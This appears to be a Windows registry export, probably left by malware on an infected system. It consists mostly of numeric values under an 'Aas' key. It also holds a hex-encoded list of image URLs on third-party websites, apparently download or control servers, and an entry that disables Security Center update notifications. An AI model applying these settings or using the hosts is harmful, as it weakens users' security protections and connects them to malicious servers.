"a3_810" = "1528623299"
"a3_817" = "1545483192"
"a3_816" = "1571594009"
"a3_815" = "1564605158"
"a1_44" = "57155867"
"a1_47" = "1868932753"
"a1_46" = "592080607"
"a4_201" = "1440993321"
"a4_200" = "1433824200"
"a4_203" = "1455331563"
"a4_202" = "1448162442"
"a4_205" = "1469669805"
"a4_204" = "1462500684"
"a4_207" = "1484008047"
"a4_206" = "1476838926"
"a4_209" = "1498346289"
"a4_208" = "1491177168"
"a4_823" = "1605219287"
"a4_449" = "3218935329"
"a4_448" = "3211766208"
"a4_119" = "853125399"
"a4_118" = "845956278"
"a4_115" = "824448915"
"a4_114" = "817279794"
"a4_117" = "838787157"
"a4_116" = "831618036"
"a4_111" = "795772431"
"a4_110" = "788603310"
"a4_113" = "810110673"
"a4_112" = "802941552"
"a4_924" = "2329300508"
"a4_565" = "4050553365"
"a3_750" = "1098874375"
"a3_751" = "1105859238"
"a3_752" = "1079359193"
"a3_753" = "1086794616"
"a4_566" = "4057722486"
"a3_921" = "2290961104"
"a3_754" = "1127403419"
"a4_879" = "2006690063"
"a3_725" = "885927068"
"a3_755" = "1134321722"
"a3_756" = "1108280413"
"a4_991" = "2809631615"
"a1_783" = "754863391"
"a3_757" = "1115339004"
"a1_959" = "1513892358"
"a2_907" = "2207432236"
"a4_990" = "2802462494"
"a1_161" = "2566369818"
"a1_160" = "2918614898"
"a1_163" = "1035816470"
"a1_162" = "3582304315"
"a1_165" = "578488711"
"a1_164" = "856161141"
"a1_167" = "2129413137"
"a1_166" = "3632263130"
"a1_169" = "982594139"
"a1_168" = "579896539"
"a4_992" = "2816800736"
"a4_994" = "2831138978"
"a3_727" = "933979486"
"a2_535" = "3835482352"
"a2_534" = "3828316364"
"a2_537" = "3849821014"
"a2_536" = "3842651464"
"a2_531" = "3806801605"
"a2_530" = "3799633671"
"a2_533" = "3821134470"
"a2_532" = "3813969831"
"a2_829" = "1648237050"
"a2_828" = "1641067747"
"a2_539" = "3864151224"
"a2_538" = "3856980043"
"a4_447" = "3204597087"
"a1_572" = "3823266062"
"a1_573" = "2926107712"
"a1_570" = "1248302988"
"a1_571" = "2199939966"
"a1_576" = "4036398643"
"a1_577" = "3504567038"
"a1_574" = "2045093664"
"a1_575" = "2012557079"
"a1_578" = "2264629770"
"a1_579" = "1696886488"
"a2_649" = "357785734"
"a2_648" = "350631513"
"a2_319" = "2286947570"
"a2_318" = "2279779180"
"a2_315" = "2258277786"
"a2_314" = "2251097546"
"a2_317" = "2272612941"
"a2_316" = "2265433531"
"a2_311" = "2229593072"
"a2_310" = "2222430912"
"a2_313" = "2243928067"
"a2_312" = "2236763928"
"a2_229" = "1641733607"
"a2_228" = "1634563071"
"a2_221" = "1584366986"
"a2_220" = "1577211543"
"a2_223" = "1598713256"
"a2_222" = "1591548686"
"a2_225" = "1613046381"
"a2_224" = "1605881210"
"a2_227" = "1627405092"
"a2_226" = "1620216914"
"a1_370" = "472838894"
"a1_371" = "4127540706"
"a1_372" = "3157408842"
"a1_373" = "3748408332"
"a1_374" = "3970393293"
"a1_375" = "1183814876"
"a1_376" = "4283962966"
"a1_377" = "4137625991"
"a1_378" = "608036100"
"a1_379" = "3844599238"
"a2_793" = "1390143340"
"a2_792" = "1382979197"
"a2_795" = "1404480563"
"a2_794" = "1397311757"
"a2_797" = "1418827994"
"a2_796" = "1411647487"
"a3_36" = "241268621"
"a3_37" = "248309804"
"a3_183" = "1328655230"
"a1_29" = "2874575059"
"a1_28" = "2083241258"
"a1_590" = "939983062"
"a1_23" = "898850058"
"a1_22" = "2336035740"
"a1_21" = "1255986976"
"a1_20" = "3623328094"
"a1_27" = "2581913483"
"a1_26" = "2000833430"
"a1_25" = "103278791"
"a1_24" = "2566690726"
"a1_284" = "3558793673"
"a1_285" = "1897324867"
"a1_286" = "3198142946"
"a1_287" = "3650977142"
"a1_280" = "1559333973"

"a1_282" = "1067750320"
"a1_283" = "1995452009"
"a3_31" = "205278614"
"a1_288" = "837850445"
"a1_289" = "2913560375"
"a3_778" = "1299211491"
"a3_779" = "1306728706"
"a2_903" = "2178748364"
"a1_591" = "446297266"
"a3_32" = "212854281"
"a2_972" = "2673468530"
"a3_558" = "4017332551"
"a3_559" = "4024255974"
"a3_556" = "3969214597"
"a3_557" = "4009757988"
"a1_552" = "2225731953"
"a3_555" = "3962303586"
"a3_552" = "3940752129"
"a3_553" = "3981361056"
"a3_550" = "3926311503"
"a3_551" = "3933234926"
"a1_598" = "3141828237"
"a1_599" = "3720239403"
"a3_178" = "1292673371"
"a3_179" = "1300121082"
"a3_174" = "1264145351"
"a3_175" = "1271198822"
"a3_176" = "1245079705"
"a3_177" = "1252068664"
"a3_170" = "1235731011"
"a3_171" = "1209100002"
"a3_172" = "1216092933"
"a3_173" = "1223671716"
"a2_31" = "222247675"
"a2_30" = "215079494"
"a2_33" = "236580561"
"a2_32" = "229414721"
"a2_35" = "250911292"
"a2_34" = "243747173"
"a2_37" = "265265620"
"a2_36" = "258082692"
"a2_39" = "279598553"
"a2_38" = "272417708"
"a3_486" = "3467639311"
"a3_487" = "3508182702"
"a3_480" = "3424608201"
"a3_481" = "3431657576"
"a3_482" = "3438646411"
"a3_483" = "3479636266"
"a4_902" = "2171579846"
"a2_584" = "4186759960"
"a4_79" = "566360559"
"a4_78" = "559191438"
"a4_906" = "2200256330"
"a4_907" = "2207425451"
"a4_904" = "2185918088"
"a2_585" = "4193943545"
"a4_73" = "523345833"
"a4_72" = "516176712"
"a4_71" = "509007591"
"a4_70" = "501838470"
"a4_77" = "552022317"
"a4_76" = "544853196"
"a4_75" = "537684075"
"a4_74" = "530514954"
"a3_642" = "324456811"
"a3_390" = "2812641775"
"a3_391" = "2786540046"
"a3_392" = "2793594529"
"a3_393" = "2800513728"
"a3_394" = "2841581411"
"a3_395" = "2848623490"
"a3_396" = "2821991461"
"a3_397" = "2829566020"
"a3_398" = "2870043879"
"a3_399" = "2877036806"
"a1_529" = "3822961966"
"a1_625" = "2525948271"
"a1_622" = "3482106339"
"a1_623" = "6932913"
"a1_620" = "3964258088"
"a1_621" = "1133322743"
"a3_643" = "331380106"

[HKCU\Software\Aas\695404737]
"7169121" = "218"

[HKCU\Software\Aas]
"a3_958" = "2556348631"
"a3_959" = "2563272054"
"a1_528" = "2828609295"
"a2_588" = "4215444611"
"a3_950" = "2498827743"
"a3_951" = "2539425406"
"a3_956" = "2575413269"
"a3_957" = "2582860980"
"a3_954" = "2527820627"
"a2_589" = "4222610939"
"a1_976" = "1943079813"
"a1_977" = "3030526784"
"a1_974" = "2737619581"
"a1_975" = "2668595226"
"a1_972" = "4063749254"
"a1_973" = "158758358"
"a1_970" = "2506510388"
"a3_827" = "1616916338"
"a1_770" = "1009082003"
"a1_978" = "117585359"
"a1_979" = "209779370"
"a4_199" = "1426655079"
"a3_505" = "3603458416"
"a3_504" = "3596547281"
"a2_363" = "2602388443"
"a3_507" = "3651577394"
"a3_506" = "3644525971"
"a3_501" = "3608550396"
"a3_500" = "3568002909"
"a3_503" = "3623047358"
"a3_502" = "3615603743"
"a4_821" = "1590881045"
"a4_698" = "709079162"
"a4_699" = "716248283"
"a4_820" = "1583711924"
"a4_692" = "666064436"
"a4_693" = "673233557"
"a4_690" = "651726194"
"a4_691" = "658895315"
"a4_696" = "694740920"
"a4_697" = "701910041"
"a4_694" = "680402678"
"a4_695" = "687571799"
"a4_822" = "1598050166"
"a3_828" = "1624490901"
"a3_829" = "1664967732"
"a3_826" = "1643547347"
"a4_825" = "1619557529"
"a3_824" = "1628992017"
"a3_825" = "1636505264"
"a3_822" = "1581458783"
"a3_823" = "1588517374"
"a3_820" = "1600580765"
"a3_821" = "1607565628"
"a2_900" = "2157247539"
"a1_746" = "3442346995"
"a4_827" = "1633895771"
"a2_901" = "2164412660"
"a3_644" = "305393197"
"a4_826" = "1626726650"
"a2_902" = "2171580969"
"a4_274" = "1964339154"
"a4_275" = "1971508275"
"a4_276" = "1978677396"
"a4_277" = "1985846517"
"a4_270" = "1935662670"
"a4_271" = "1942831791"
"a4_272" = "1950000912"
"a4_273" = "1957170033"
"a2_904" = "2185912535"
"a4_278" = "1993015638"
"a4_279" = "2000184759"
"a2_905" = "2193080399"
"a2_906" = "2200248989"
"a4_478" = "3426839838"
"a4_479" = "3434008959"
"a4_476" = "3412501596"
"a4_477" = "3419670717"
"a4_474" = "3398163354"
"a4_475" = "3405332475"
"a4_472" = "3383825112"
"a4_473" = "3390994233"
"a4_470" = "3369486870"
"a4_471" = "3376655991"
"a4_308" = "2208089268"
"a4_309" = "2215258389"
"a4_300" = "2150736300"
"a4_301" = "2157905421"
"a4_302" = "2165074542"
"a4_303" = "2172243663"
"a4_304" = "2179412784"
"a4_305" = "2186581905"
"a4_306" = "2193751026"
"a4_307" = "2200920147"
"a1_114" = "411323433"
"a1_115" = "1798063396"
"a1_116" = "445925705"
"a1_117" = "1261207579"
"a1_110" = "562005972"
"a1_111" = "3278430025"
"a1_112" = "3173036730"
"a1_113" = "4162935684"
"a1_824" = "2353155555"
"a1_118" = "2608938211"
"a1_119" = "429151588"
"a4_576" = "4129413696"
"a4_920" = "2300624024"
"a3_732" = "969437045"
"a2_498" = "3570226065"
"a2_499" = "3577393289"
"a2_492" = "3527212503"
"a2_493" = "3534378608"
"a2_490" = "3512895525"
"a2_491" = "3520044055"
"a2_496" = "3555875511"
"a2_497" = "3563046444"
"a2_494" = "3541544697"
"a2_495" = "3548722268"
"a2_816" = "1555030743"
"a2_817" = "1562213910"
"a2_814" = "1540701056"
"a2_815" = "1547863963"
"a2_812" = "1526364355"
"a3_740" = "1026900557"
"a2_810" = "1512029879"
"a2_811" = "1519183569"
"a3_733" = "943391636"
"a4_570" = "4086398970"
"a2_818" = "1569365678"
"a2_819" = "1576546672"
"a1_565" = "2928101998"
"a1_564" = "486907233"
"a1_567" = "1184952683"
"a1_566" = "1661342408"
"a1_561" = "3411605134"
"a1_560" = "985373065"
"a1_563" = "867306729"
"a1_562" = "1870731983"
"a1_569" = "3786132020"
"a1_568" = "4120695415"
"a1_525" = "3532887528"
"a2_678" = "565692086"
"a2_679" = "572860088"
"a2_676" = "551366771"
"a2_677" = "558520069"
"a2_674" = "537027926"
"a2_675" = "544191120"
"a2_672" = "522676252"
"a2_673" = "529857804"
"a2_670" = "508341909"
"a2_671" = "515506922"
"a3_982" = "2728158783"
"a2_258" = "1849625409"
"a2_259" = "1856803428"
"a2_254" = "1820951253"
"a2_255" = "1828116563"
"a2_256" = "1835300975"
"a2_257" = "1842469783"
"a2_250" = "1792285651"
"a2_251" = "1799454290"
"a2_252" = "1806625873"
"a2_253" = "1813778921"
"a1_363" = "987055920"
"a1_362" = "487622494"
"a1_361" = "2535883478"
"a1_360" = "154270625"
"a1_367" = "564120642"
"a1_366" = "1634264304"
"a1_365" = "4190038558"
"a1_364" = "415194928"
"a1_369" = "1902923840"
"a1_368" = "460828076"
"a3_977" = "2692709400"
"a3_924" = "2346001461"
"a1_38" = "189863093"
"a1_39" = "3550613625"
"a1_30" = "4282815863"
"a1_31" = "430293803"
"a1_32" = "1708107647"
"a1_33" = "2929434835"
"a1_34" = "307448102"
"a1_35" = "3446818814"
"a1_36" = "449428711"
"a1_37" = "2596242110"
"a1_297" = "2191886428"
"a1_296" = "3337219732"
"a1_295" = "2031549599"
"a1_294" = "1498966958"
"a1_293" = "4201422777"
"a1_292" = "296904557"
"a1_291" = "4139746545"
"a1_290" = "4021317343"
"a1_299" = "3128848786"
"a1_298" = "1177532838"
"a3_769" = "1234824520"
"a1_600" = "2272385769"
"a2_668" = "494006389"
"a1_601" = "2047718403"
"a3_761" = "1143737968"
"a3_760" = "1170380241"
"a3_763" = "1191790386"
"a4_286" = "2050368606"
"a3_765" = "1206362100"
"a1_602" = "1891000398"
"a3_767" = "1186780342"
"a3_766" = "1179725847"
"a2_108" = "774260303"
"a2_109" = "781425859"
"a4_878" = "1999520942"
"a1_603" = "118449278"
"a2_100" = "716904137"
"a2_101" = "724075144"
"a2_102" = "731243161"
"a2_103" = "738424376"
"a2_104" = "745593493"
"a2_105" = "752761902"
"a2_106" = "759926589"
"a2_107" = "767090960"
"a3_541" = "3861793492"
"a3_540" = "3887912629"
"a3_543" = "3909387158"
"a3_542" = "3868847991"
"a3_545" = "3923892392"
"a3_544" = "3916833801"
"a3_547" = "3904770410"
"a3_546" = "3897785547"
"a3_549" = "3952815660"
"a3_548" = "3945379213"
"a1_607" = "1690365608"
"a1_589" = "129090833"
"a1_588" = "772432731"
"a3_169" = "1228156448"
"a3_168" = "1187689857"
"a3_167" = "1180635502"
"a3_166" = "1206680783"
"a3_165" = "1199757484"
"a3_164" = "1192698893"
"a3_163" = "1151697898"
"a3_162" = "1144713035"
"a3_161" = "1171213096"
"a3_160" = "1163777673"
"a1_749" = "3949280148"
"a1_748" = "1140331521"
"a2_28" = "200727499"
"a2_29" = "207896816"
"a2_26" = "186395626"
"a2_27" = "193560584"
"a2_24" = "172061124"
"a2_25" = "179230852"
"a2_22" = "157713193"
"a2_23" = "164895463"
"a2_20" = "143379152"
"a2_21" = "150546176"
"a4_68" = "487500228"
"a4_69" = "494669349"
"a4_917" = "2279116661"
"a4_916" = "2271947540"
"a4_911" = "2236101935"
"a4_910" = "2228932814"
"a4_913" = "2250440177"
"a4_912" = "2243271056"
"a4_60" = "430147260"
"a4_61" = "437316381"
"a4_62" = "444485502"
"a4_63" = "451654623"
"a4_64" = "458823744"
"a4_65" = "465992865"
"a4_66" = "473161986"
"a4_67" = "480331107"
"a4_833" = "1676910497"
"a4_959" = "2580219743"
"a2_758" = "1139220553"
"a2_7" = "50175488"
"a2_6" = "43009672"
"a2_5" = "35842745"
"a2_4" = "28675893"
"a2_3" = "21510676"
"a2_2" = "14340133"
"a2_1" = "7172457"
"a2_0" = "9039"
"a1_639" = "2062313174"
"a1_638" = "3599260906"
"a3_389" = "2805656908"
"a3_388" = "2765048109"
"a2_9" = "64528010"
"a2_8" = "57359094"
"a4_5" = "35845605"
"a4_4" = "28676484"
"a4_7" = "50183847"
"a4_6" = "43014726"
"a4_1" = "7169121"
"a4_0" = "0"
"a4_3" = "21507363"
"a4_2" = "14338242"
"a4_9" = "64522089"
"a4_8" = "57352968"
"a2_756" = "1124890275"
"a3_949" = "2491838908"
"a3_948" = "2484395293"
"a3_945" = "2462900280"
"a3_944" = "2455850905"
"a3_947" = "2510895354"
"a3_946" = "2503967835"
"a3_941" = "2467992228"
"a3_940" = "2427452933"
"a3_943" = "2482482022"
"a3_942" = "2474915527"
"a3_875" = "1961196962"
"a1_532" = "11409329"
"a1_533" = "3995154251"
"a4_845" = "1762939949"
"a2_853" = "1820284624"
"a3_708" = "797636205"
"a4_923" = "2322131387"
"a3_970" = "2675785123"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "86 8B CF 82 61 5C 66 6D AB D0 2F EA 78 DA 6A 10"

[HKCU\Software\Aas]
"a1_968" = "3110860190"
"a4_689" = "644557073"
"a4_688" = "637387952"
"a1_951" = "1042045673"
"a4_685" = "615880589"
"a4_684" = "608711468"
"a4_687" = "630218831"
"a4_686" = "623049710"
"a4_681" = "587204105"
"a4_680" = "580034984"
"a4_683" = "601542347"
"a4_682" = "594373226"
"a3_831" = "1645985014"
"a3_830" = "1671960663"
"a3_833" = "1659958664"
"a3_832" = "1652904297"
"a3_835" = "1707934282"
"a1_538" = "2894422628"
"a3_837" = "1688886028"
"a3_836" = "1681434349"
"a3_839" = "1736479694"
"a3_838" = "1729494959"
"a1_539" = "3598831970"
"a1_957" = "4062433674"
"a4_267" = "1914155307"
"a4_266" = "1906986186"
"a4_265" = "1899817065"
"a4_264" = "1892647944"
"a4_263" = "1885478823"
"a4_262" = "1878309702"
"a4_261" = "1871140581"
"a4_260" = "1863971460"

[HKCU\Software\Aas\695404737]
"43014726" = "0A00687474703A2F2F63616465732E636F6D2E61722F696D616765732F6C6F676F2E67696600687474703A2F2F636576697A74762E636F6D2F696D616765732F6C6F676F2E67696600687474703A2F2F746861692D736B796C696768742E636F6D2F627574746F6E2E67696600687474703A2F2F636F726573646162616869612E636F6D2F696D616765732F6C6F676F2E67696600687474703A2F2F736D6F6B696E2D74722E636F6D2F6173736574732F696D616765732F6C6F676F2E67696600687474703A2F2F7777772E62756572676572666573742D6772616566656E626572672E64652F6C6F676F2E67696600687474703A2F2F77696E676D616B657273686F70652E7A612E706C2F696D616765732F627574746F6E2E67696600687474703A2F2F77656C6C73736D616C6C2E636F6D2F696D616765732F6C6F676F2E67696600687474703A2F2F7777772E75656873692E64652F6C6F676F2E67696600687474703A2F2F686F74656C697370622E686F702E72752F696D6167652F6C6F676F2E676966"

[HKCU\Software\Aas]
"a4_269" = "1928493549"
"a4_268" = "1921324428"
"a4_461" = "3304964781"
"a4_460" = "3297795660"
"a4_463" = "3319303023"
"a4_462" = "3312133902"
"a4_465" = "3333641265"
"a4_464" = "3326472144"
"a4_467" = "3347979507"
"a4_466" = "3340810386"
"a4_469" = "3362317749"
"a4_468" = "3355148628"
"a4_897" = "2135734241"
"a4_898" = "2142903362"
"a4_899" = "2150072483"
"a2_560" = "4014704660"
"a4_319" = "2286949599"
"a4_318" = "2279780478"
"a1_840" = "1984399133"
"a4_313" = "2243934873"
"a4_312" = "2236765752"
"a4_311" = "2229596631"
"a4_310" = "2222427510"
"a4_317" = "2272611357"
"a4_316" = "2265442236"
"a4_315" = "2258273115"
"a4_314" = "2251103994"

"a3_130" = "915379051"
"a1_923" = "2102776783"
"a3_131" = "922302346"
"a3_132" = "962897965"
"a2_880" = "2013861914"
"a1_107" = "3061453263"
"a1_106" = "2032978449"
"a1_105" = "3176580031"
"a1_104" = "1990028962"
"a1_103" = "2802336350"
"a1_102" = "1632706426"
"a1_101" = "2286375041"
"a1_100" = "2488396436"
"a3_134" = "943841519"
"a1_109" = "3860163356"
"a1_62" = "460365777"
"a1_61" = "320428109"
"a3_137" = "998890944"
"a2_883" = "2035360616"
"a3_686" = "606179783"
"a2_489" = "3505692798"
"a2_488" = "3498539973"
"a3_687" = "613616230"
"a2_485" = "3477028258"
"a2_484" = "3469859676"
"a2_487" = "3491357050"
"a2_486" = "3484191164"
"a2_481" = "3448342247"
"a2_480" = "3441169409"
"a2_483" = "3462692110"
"a2_482" = "3455507855"
"a3_974" = "2704311079"
"a3_685" = "632749476"
"a3_975" = "2711758662"
"a2_882" = "2028194617"
"a3_976" = "2685262841"
"a2_809" = "1504847898"
"a2_808" = "1497681866"
"a4_721" = "873968945"
"a3_680" = "596757377"
"a2_801" = "1447495918"
"a2_800" = "1440330654"
"a2_803" = "1461832574"
"a3_681" = "570649632"
"a2_805" = "1476181546"
"a2_804" = "1469012351"
"a2_807" = "1490514079"
"a2_806" = "1483348544"
"a3_145" = "1022800088"
"a3_972" = "2656717413"
"a3_144" = "1015749817"
"a2_885" = "2049711365"
"a3_973" = "2663771780"
"a3_147" = "1070844314"
"a2_661" = "443825134"
"a2_660" = "436660783"
"a2_663" = "458156937"
"a3_146" = "1063277947"
"a2_665" = "472492520"
"a2_664" = "465322195"
"a2_667" = "486840295"
"a2_666" = "479674027"
"a2_669" = "501173593"
"a3_141" = "1027810116"
"a3_140" = "986812197"
"a2_881" = "2021026294"
"a3_143" = "1008236550"
"a2_249" = "1785129456"
"a2_248" = "1777937175"
"a2_247" = "1770781254"
"a2_246" = "1763595533"
"a2_245" = "1756432018"
"a2_244" = "1749257971"
"a2_243" = "1742100367"
"a2_242" = "1734933986"
"a2_241" = "1727750790"
"a2_240" = "1720584026"
"a1_356" = "522743864"
"a1_357" = "3698075788"
"a1_354" = "303454233"
"a1_355" = "1707461298"
"a1_352" = "3527033019"
"a1_353" = "2484309462"
"a1_350" = "1020180167"
"a1_351" = "606926258"
"a2_855" = "1834624644"
"a3_639" = "269411382"
"a1_358" = "1924247729"
"a1_359" = "4149522257"
"a3_638" = "295912343"
"a2_887" = "2064044676"
"a2_886" = "2056864919"
"a3_795" = "1387647762"
"a3_718" = "869065255"
"a3_719" = "843023942"
"a3_714" = "807050403"
"a3_715" = "813969602"
"a3_716" = "821548389"
"a3_717" = "862013828"
"a3_710" = "778506031"
"a3_711" = "785556302"
"a3_712" = "826034145"
"a3_713" = "833615872"
"a2_820" = "1583714595"
"a2_119" = "853128804"
"a2_118" = "845961958"
"a4_869" = "1934998853"
"a4_868" = "1927829732"
"a2_113" = "810113245"
"a2_112" = "802932741"
"a2_111" = "795777957"
"a2_110" = "788610124"
"a2_117" = "838792476"
"a2_116" = "831608963"
"a2_115" = "824443222"
"a2_114" = "817276370"
"a3_534" = "3844868223"
"a3_535" = "3852446878"
"a3_536" = "3825811761"
"a3_537" = "3832866128"
"a3_530" = "3816471291"
"a3_531" = "3823394586"
"a3_532" = "3797414845"
"a1_403" = "3757031581"
"a3_538" = "3840383475"
"a3_539" = "3880858130"
"a2_813" = "1533537056"
"a3_152" = "1106310065"
"a3_153" = "1080268752"
"a3_150" = "1092336383"
"a3_151" = "1099259678"
"a3_156" = "1135231285"
"a3_157" = "1108731220"
"a3_154" = "1087178867"
"a3_155" = "1127787666"
"a3_628" = "223959005"
"a3_629" = "231000188"
"a3_158" = "1115724279"
"a3_159" = "1123168790"
"a2_59" = "422983093"
"a2_58" = "415801449"
"a2_53" = "379971678"
"a2_52" = "372800663"
"a2_51" = "365617913"
"a2_50" = "358463685"
"a2_57" = "408634297"
"a2_56" = "401468068"
"a2_55" = "394299658"
"a2_54" = "387135135"
"a4_842" = "1741432586"
"a4_55" = "394301655"
"a4_54" = "387132534"
"a4_57" = "408639897"
"a4_56" = "401470776"
"a4_51" = "365625171"
"a4_50" = "358456050"
"a4_53" = "379963413"
"a4_52" = "372794292"
"a3_440" = "3171413137"
"a3_441" = "3178398000"
"a3_442" = "3185321299"
"a3_443" = "3159349746"
"a4_59" = "422978139"
"a4_58" = "415809018"
"a3_446" = "3214379735"
"a3_447" = "3187748726"
"a1_644" = "3090955613"
"a1_645" = "3093029922"
"a1_646" = "3925084020"
"a1_647" = "2280808859"
"a1_640" = "1805584969"
"a1_641" = "1341072309"
"a1_642" = "1357193244"
"a1_643" = "259929296"
"a1_648" = "4261343284"
"a1_649" = "3124230902"

[HKCU\Software\Aas\695404737]
"21507363" = "0"

[HKCU\Software\Aas]
"a2_953" = "2537207766"
"a3_459" = "3307312066"
"a3_458" = "3266772899"
"a4_784" = "1325623568"
"a4_785" = "1332792689"
"a4_786" = "1339961810"
"a4_787" = "1347130931"
"a4_780" = "1296947084"
"a4_781" = "1304116205"
"a4_782" = "1311285326"
"a4_783" = "1318454447"
"a1_828" = "2920560398"
"a1_829" = "1546142883"
"a4_788" = "1354300052"
"a3_451" = "3249847498"
"a4_670" = "508343774"
"a4_671" = "515512895"
"a4_672" = "522682016"
"a3_450" = "3242793131"
"a4_674" = "537020258"
"a4_675" = "544189379"
"a4_676" = "551358500"
"a4_677" = "558527621"
"a4_678" = "565696742"
"a1_604" = "3981759629"
"a1_916" = "3845104223"
"a1_917" = "4250723787"
"a1_910" = "2452170860"
"a1_911" = "531952798"
"a1_912" = "2880988204"
"a1_913" = "1691396394"
"a3_844" = "1772455397"
"a3_845" = "1746353668"
"a3_846" = "1753404071"
"a3_847" = "1760327366"
"a3_840" = "1743926369"
"a3_841" = "1717414016"
"a3_842" = "1724861731"
"a3_843" = "1765466434"
"a3_848" = "1801448313"
"a3_849" = "1808437144"
"a3_702" = "721038295"
"a4_874" = "1970844458"
"a1_654" = "17632213"
"a4_961" = "2594557985"
"a4_414" = "2968016094"
"a4_415" = "2975185215"
"a4_416" = "2982354336"
"a4_417" = "2989523457"
"a4_410" = "2939339610"
"a4_411" = "2946508731"
"a4_412" = "2953677852"
"a4_413" = "2960846973"
"a4_418" = "2996692578"
"a4_419" = "3003861699"
"a3_806" = "1500078927"
"a3_807" = "1507067886"
"a1_138" = "1482427011"
"a1_139" = "3244776047"
"a3_907" = "2190592386"
"a1_132" = "2350124381"
"a1_133" = "1896767070"
"a1_130" = "2553053064"
"a1_131" = "3742579454"
"a1_136" = "375208661"
"a1_137" = "322056140"
"a1_134" = "3546464368"
"a1_135" = "1251533170"
"a3_768" = "1227770153"
"a4_328" = "2351471688"
"a4_329" = "2358640809"
"a4_326" = "2337133446"
"a4_327" = "2344302567"
"a4_324" = "2322795204"
"a4_325" = "2329964325"
"a4_322" = "2308456962"
"a4_323" = "2315626083"
"a4_320" = "2294118720"
"a4_321" = "2301287841"
"a4_528" = "3785295888"
"a4_529" = "3792465009"
"a4_258" = "1849633218"
"a4_259" = "1856802339"
"a4_252" = "1806618492"
"a4_253" = "1813787613"
"a4_250" = "1792280250"
"a4_251" = "1799449371"
"a4_256" = "1835294976"
"a4_257" = "1842464097"
"a4_254" = "1820956734"
"a4_255" = "1828125855"
"a3_909" = "2238580292"
"a2_470" = "3369488761"
"a2_471" = "3376657996"
"a2_472" = "3383833219"
"a2_473" = "3390991158"
"a2_474" = "3398159404"
"a2_475" = "3405323404"
"a2_476" = "3412507315"
"a2_477" = "3419712060"
"a2_478" = "3426864393"
"a2_479" = "3434008304"
"a4_880" = "2013859184"
"a3_908" = "2231591461"
"a1_797" = "1237177382"
"a2_878" = "1999527143"
"a2_879" = "2006681752"
"a2_874" = "1970840621"
"a2_875" = "1978009880"
"a2_876" = "1985177057"
"a2_877" = "1992359662"
"a2_870" = "1942173789"
"a2_871" = "1949345491"
"a2_872" = "1956464617"
"a2_873" = "1963683310"
"a1_349" = "4147842036"
"a1_348" = "3121588449"
"a2_586" = "4201112512"
"a2_587" = "4208276670"
"a2_580" = "4158092509"
"a2_581" = "4165257994"
"a2_582" = "4172425613"
"a2_583" = "4179606829"
"a1_341" = "549346406"
"a1_340" = "427734536"
"a1_343" = "396794667"
"a1_342" = "370409290"
"a1_345" = "3010585812"
"a1_344" = "1742085644"
"a1_347" = "3645687770"
"a1_346" = "2992413863"
"a2_614" = "106880024"
"a2_615" = "114047908"
"a2_616" = "121214653"
"a2_617" = "128382650"
"a2_610" = "78198997"
"a2_611" = "85363668"
"a2_612" = "92524676"
"a2_613" = "99697063"
"a2_618" = "135557671"
"a2_619" = "142710468"
"a2_272" = "1950003834"
"a2_273" = "1957171979"
"a2_270" = "1935656444"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"UpdatesDisableNotify" = "1"

[HKCU\Software\Aas]
"a2_276" = "1978674905"
"a2_277" = "1985839282"
"a2_274" = "1964340677"
"a2_275" = "1971515897"
"a2_908" = "2214603122"
"a2_909" = "2221767442"
"a2_278" = "1993021585"
"a2_279" = "2000176164"
"a1_842" = "819285852"
"a2_298" = "2136407328"
"a2_299" = "2143560047"
"a1_841" = "2527890420"
"a2_290" = "2079042917"
"a2_291" = "2086209277"
"a2_292" = "2093374851"
"a2_293" = "2100559315"
"a2_294" = "2107727825"
"a2_295" = "2114892512"
"a2_296" = "2122057493"
"a2_297" = "2129224620"
"a2_728" = "924150131"
"a2_729" = "931316684"
"a2_720" = "866796551"
"a2_721" = "873964326"
"a2_722" = "881132833"
"a2_723" = "888300245"
"a2_724" = "895483247"
"a2_725" = "902649098"
"a2_726" = "909805627"
"a2_727" = "916985610"
"a1_594" = "733341403"
"a4_450" = "3226104450"
"a3_791" = "1392659870"
"a3_709" = "804547212"
"a4_451" = "3233273571"
"a3_707" = "790584778"
"a3_706" = "749582763"
"a3_705" = "742524168"
"a3_704" = "769089769"
"a3_703" = "761646198"
"a4_452" = "3240442692"
"a3_701" = "713602996"
"a3_700" = "706548501"
"a4_890" = "2085550394"
"a4_891" = "2092719515"
"a4_892" = "2099888636"
"a4_453" = "3247611813"
"a4_894" = "2114226878"
"a4_895" = "2121395999"
"a2_128" = "917645925"
"a2_129" = "924815309"
"a2_126" = "903300717"
"a2_127" = "910487455"
"a2_124" = "888963927"
"a2_125" = "896145322"
"a2_122" = "874631143"
"a2_123" = "881796027"
"a2_120" = "860296235"
"a2_121" = "867461381"
"a3_35" = "267899754"
"a3_526" = "3787937127"
"a3_525" = "3780489412"
"a3_524" = "3739884709"
"a3_523" = "3732895746"
"a4_456" = "3269119176"
"a3_521" = "3751945024"
"a3_520" = "3744501537"
"a2_824" = "1612383063"
"a4_457" = "3276288297"
"a3_529" = "3809412696"
"a3_528" = "3768345145"
"a1_12" = "3591296450"
"a1_13" = "3684116147"
"a1_10" = "3939837768"
"a1_11" = "3927362017"
"a1_16" = "3516392527"
"a1_17" = "3784217508"
"a1_14" = "2443395972"
"a1_15" = "2631994645"
"a1_18" = "1696823912"
"a1_19" = "4093072486"
"a3_149" = "1051199068"
"a3_148" = "1044210237"
"a2_896" = "2128574026"
"a2_48" = "344126211"
"a2_49" = "351285117"
"a1_846" = "237312209"
"a2_40" = "286767844"
"a2_41" = "293942062"
"a2_42" = "301100775"
"a2_43" = "308265510"
"a2_44" = "315450726"
"a2_45" = "322602716"
"a2_46" = "329782113"
"a2_47" = "336951144"
"a2_897" = "2135728134"
"a4_42" = "301103082"
"a4_43" = "308272203"
"a4_40" = "286764840"
"a4_41" = "293933961"
"a4_46" = "329779566"
"a4_47" = "336948687"
"a4_44" = "315441324"
"a4_45" = "322610445"
"a3_453" = "3230791052"
"a3_452" = "3223736685"
"a4_48" = "344117808"
"a4_49" = "351286929"
"a3_457" = "3259718400"
"a3_456" = "3285821153"
"a3_455" = "3278766670"
"a3_454" = "3271781935"
"a1_657" = "1986516815"
"a1_656" = "2483634941"
"a1_655" = "673775222"
"a1_632" = "1417659261"
"a1_653" = "1740411310"
"a1_652" = "4189869687"
"a1_651" = "3568257454"
"a1_650" = "377868318"
"a3_796" = "1428649909"
"a1_659" = "2228559100"
"a1_658" = "637116160"
"a3_797" = "1435691988"
"a3_18" = "112354555"
